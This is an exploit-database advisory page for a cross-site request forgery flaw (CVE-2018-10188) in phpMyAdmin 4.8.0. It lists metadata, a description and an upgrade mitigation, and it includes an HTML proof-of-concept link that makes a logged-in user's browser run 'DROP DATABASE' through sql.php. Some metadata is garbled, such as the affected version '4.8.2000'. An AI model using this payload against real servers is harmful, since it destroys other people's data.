phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery

vendor:

phpMyAdmin

by:

@revengsh & @0x00FI

8.8

CVSS

HIGH

Cross-Site Request Forgery

Unknown

CWE

Product Name: phpMyAdmin

Affected Version From: 4.8.2000

Affected Version To: 4.8.0-1

Patch Exists: YES

Related CWE: CVE-2018-10188

CPE: Unknown

Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-10188/, https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2018-10188/, https://www.rapid7.com/db/vulnerabilities/phpmyadmin-cve-2018-10188/

Other Scripts:

Platforms Tested:

2018

phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery

The vulnerability exists due to failure in the '/sql.php' script to properly verify the source of HTTP request. This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.

Mitigation:

Upgrade to phpMyAdmin 4.8.0-1 or newer.

Source

Exploit-DB raw data:

# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps


#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.


<html>
  <body>
    <a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
      Drop database
    </a>
  </body>
</html>

#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188